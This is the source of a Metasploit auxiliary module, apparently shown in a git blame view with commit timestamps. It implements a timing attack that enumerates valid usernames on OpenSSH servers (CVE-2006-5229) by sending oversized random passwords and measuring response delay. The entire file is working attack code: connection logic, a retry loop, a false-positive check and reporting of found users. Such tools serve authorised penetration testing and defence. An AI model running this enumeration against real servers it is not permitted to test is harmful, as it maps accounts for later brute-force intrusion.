2014-03-28 15:23:48 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-03-28 15:23:48 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'net/ssh'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::CommandShell
|
|
|
|
|
2014-04-23 15:00:34 +00:00
|
|
|
def initialize(info = {})
|
2014-04-23 15:08:37 +00:00
|
|
|
super(update_info(info,
|
2014-03-28 15:23:48 +00:00
|
|
|
'Name' => 'SSH Username Enumeration',
|
|
|
|
'Description' => %q{
|
2014-04-29 15:48:32 +00:00
|
|
|
This module uses a time-based attack to enumerate users on an OpenSSH server.
|
|
|
|
On some versions of OpenSSH under some configurations, OpenSSH will return a
|
|
|
|
"permission denied" error for an invalid user faster than for a valid user.
|
|
|
|
},
|
|
|
|
'Author' => ['kenkeiras'],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2006-5229'],
|
|
|
|
['OSVDB', '32721'],
|
|
|
|
['BID', '20418']
|
|
|
|
],
|
2014-03-28 15:23:48 +00:00
|
|
|
'License' => MSF_LICENSE
|
2014-04-23 15:00:34 +00:00
|
|
|
))
|
2014-03-28 15:23:48 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2014-10-21 20:39:24 +00:00
|
|
|
Opt::Proxies,
|
2014-04-23 15:00:34 +00:00
|
|
|
Opt::RPORT(22),
|
2014-04-18 19:56:17 +00:00
|
|
|
OptPath.new('USER_FILE',
|
2014-04-23 15:00:34 +00:00
|
|
|
[true, 'File containing usernames, one per line', nil]),
|
2014-04-18 19:18:48 +00:00
|
|
|
OptInt.new('THRESHOLD',
|
2014-04-23 15:00:34 +00:00
|
|
|
[true,
|
|
|
|
'Amount of seconds needed before a user is considered ' \
|
|
|
|
'found', 10])
|
2014-03-28 15:23:48 +00:00
|
|
|
], self.class
|
|
|
|
)
|
|
|
|
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
|
|
|
OptInt.new('RETRY_NUM',
|
|
|
|
[true , 'The number of attempts to connect to a SSH server' \
|
2014-04-23 15:00:34 +00:00
|
|
|
' for each user', 3]),
|
|
|
|
OptInt.new('SSH_TIMEOUT',
|
|
|
|
[false, 'Specify the maximum time to negotiate a SSH session',
|
|
|
|
10]),
|
|
|
|
OptBool.new('SSH_DEBUG',
|
|
|
|
[false, 'Enable SSH debugging output (Extreme verbosity!)',
|
|
|
|
false])
|
2014-03-28 15:23:48 +00:00
|
|
|
]
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
def rport
|
|
|
|
datastore['RPORT']
|
|
|
|
end
|
|
|
|
|
|
|
|
def retry_num
|
|
|
|
datastore['RETRY_NUM']
|
|
|
|
end
|
|
|
|
|
2014-04-18 19:18:48 +00:00
|
|
|
def threshold
|
|
|
|
datastore['THRESHOLD']
|
|
|
|
end
|
2014-03-28 15:23:48 +00:00
|
|
|
|
2014-04-29 15:07:42 +00:00
|
|
|
# Returns true if a nonsense username appears active.
|
|
|
|
def check_false_positive(ip)
|
2014-04-29 15:14:41 +00:00
|
|
|
user = Rex::Text.rand_text_alphanumeric(8)
|
2014-04-29 15:07:42 +00:00
|
|
|
result = attempt_user(user, ip)
|
|
|
|
return(result == :success)
|
|
|
|
end
|
|
|
|
|
2014-03-28 15:23:48 +00:00
|
|
|
def check_user(ip, user, port)
|
2014-04-18 19:10:34 +00:00
|
|
|
pass = Rex::Text.rand_text_alphanumeric(64_000)
|
2014-03-28 15:23:48 +00:00
|
|
|
|
|
|
|
opt_hash = {
|
|
|
|
:auth_methods => ['password', 'keyboard-interactive'],
|
|
|
|
:msframework => framework,
|
|
|
|
:msfmodule => self,
|
|
|
|
:port => port,
|
|
|
|
:disable_agent => true,
|
|
|
|
:password => pass,
|
|
|
|
:config => false,
|
|
|
|
:proxies => datastore['Proxies']
|
|
|
|
}
|
|
|
|
|
|
|
|
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
|
|
|
|
|
|
|
|
start_time = Time.new
|
|
|
|
|
|
|
|
begin
|
|
|
|
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
|
2014-04-18 19:46:51 +00:00
|
|
|
Net::SSH.start(ip, user, opt_hash)
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|
2014-11-11 20:59:41 +00:00
|
|
|
rescue Rex::ConnectionError
|
2014-03-28 15:23:48 +00:00
|
|
|
return :connection_error
|
|
|
|
rescue Net::SSH::Disconnect, ::EOFError
|
|
|
|
return :success
|
|
|
|
rescue ::Timeout::Error
|
|
|
|
return :success
|
|
|
|
rescue Net::SSH::Exception
|
|
|
|
end
|
|
|
|
|
|
|
|
finish_time = Time.new
|
|
|
|
|
2014-04-18 19:18:48 +00:00
|
|
|
if finish_time - start_time > threshold
|
2014-04-22 20:18:50 +00:00
|
|
|
:success
|
2014-03-28 15:23:48 +00:00
|
|
|
else
|
2014-04-22 20:18:50 +00:00
|
|
|
:fail
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def do_report(ip, user, port)
|
|
|
|
report_auth_info(
|
2014-04-23 15:00:34 +00:00
|
|
|
:host => ip,
|
|
|
|
:port => rport,
|
|
|
|
:sname => 'ssh',
|
|
|
|
:user => user,
|
2014-03-28 15:23:48 +00:00
|
|
|
:active => true
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
2014-04-28 18:36:45 +00:00
|
|
|
# Because this isn't using the AuthBrute mixin, we don't have the
|
|
|
|
# usual peer method
|
|
|
|
def peer(rhost=nil)
|
|
|
|
"#{rhost}:#{rport} - SSH -"
|
|
|
|
end
|
|
|
|
|
2014-03-28 15:23:48 +00:00
|
|
|
def user_list
|
2014-04-28 18:36:45 +00:00
|
|
|
if File.readable? datastore['USER_FILE']
|
|
|
|
File.new(datastore['USER_FILE']).read.split
|
|
|
|
else
|
|
|
|
raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
|
|
|
|
end
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def attempt_user(user, ip)
|
|
|
|
attempt_num = 0
|
|
|
|
ret = nil
|
|
|
|
|
|
|
|
while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
|
|
|
|
if attempt_num > 0
|
2014-04-22 20:16:16 +00:00
|
|
|
Rex.sleep(2 ** attempt_num)
|
2015-04-21 16:14:03 +00:00
|
|
|
vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
ret = check_user(ip, user, rport)
|
|
|
|
attempt_num += 1
|
|
|
|
end
|
2014-04-23 15:00:34 +00:00
|
|
|
|
2014-04-22 20:18:50 +00:00
|
|
|
ret
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def show_result(attempt_result, user, ip)
|
|
|
|
case attempt_result
|
|
|
|
when :success
|
2015-04-21 16:14:03 +00:00
|
|
|
print_good("#{peer(ip)} User '#{user}' found")
|
2014-03-28 15:23:48 +00:00
|
|
|
do_report(ip, user, rport)
|
|
|
|
when :connection_error
|
2015-04-21 16:14:03 +00:00
|
|
|
print_error("#{peer(ip)} User '#{user}' on could not connect")
|
2014-03-28 15:23:48 +00:00
|
|
|
when :fail
|
2015-04-21 16:14:03 +00:00
|
|
|
print_error("#{peer(ip)} User '#{user}' not found")
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
2014-04-29 15:07:42 +00:00
|
|
|
print_status "#{peer(ip)} Checking for false positives"
|
|
|
|
if check_false_positive(ip)
|
|
|
|
print_error "#{peer(ip)} throws false positive results. Aborting."
|
|
|
|
return
|
|
|
|
else
|
2014-04-29 15:14:41 +00:00
|
|
|
print_status "#{peer(ip)} Starting scan"
|
2014-04-29 15:07:42 +00:00
|
|
|
user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
|
|
|
|
end
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|
2014-04-23 15:00:34 +00:00
|
|
|
|
2014-03-28 15:23:48 +00:00
|
|
|
end
|